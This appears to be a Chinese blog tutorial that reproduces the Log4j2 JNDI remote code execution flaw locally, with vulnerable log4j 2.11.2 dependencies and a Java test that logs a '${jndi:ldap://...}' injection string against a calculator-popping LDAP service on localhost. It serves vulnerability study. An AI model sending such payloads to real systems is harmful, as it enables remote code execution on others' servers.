1.pom.xml从漏洞曝出,因为从来就没有了解过jndi,所以花了有一天时间才搞出。
以下是简单教程。
org.apache.logging.log4j
log4j-core
2.11.2
org.apache.logging.log4j
log4j-api
2.11.2
2.log4j2.xml
3.在127.0.0.1:9527先架设个恶意服务,该服务里面的代码是弹出计算器。 4.做个测试
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class LogTest {
public static Logger log = LogManager.getLogger(LogTest.class);
public static void main(String[] args) {
log.info("${jndi:ldap://127.0.0.1:9527/Muma}");
}
}
5.看下效果
6.最为关键的,怎么架设?
看我另外一篇博客:
JNDI注入demo使用ldap方式
- 注意log4j2漏洞不止ldap,对于rmi同样有效
- 漏洞比较猛
- JNDI学习总结(一):JNDI到底是什么?
- 浅谈JNDI
- 初识JNDI
- [web安全]Apache Log4j2远程代码执行漏洞
- LDAP入门
- 服务器搭建八——LDAP目录服务器
- 如何安装配置Active Directory
- LDAP基础:AD:运行在容器中的Active Directory服务
- 漏洞复现丨快速开启RMI&&LDAP
- Apache Log4j2远程代码执行漏洞复现



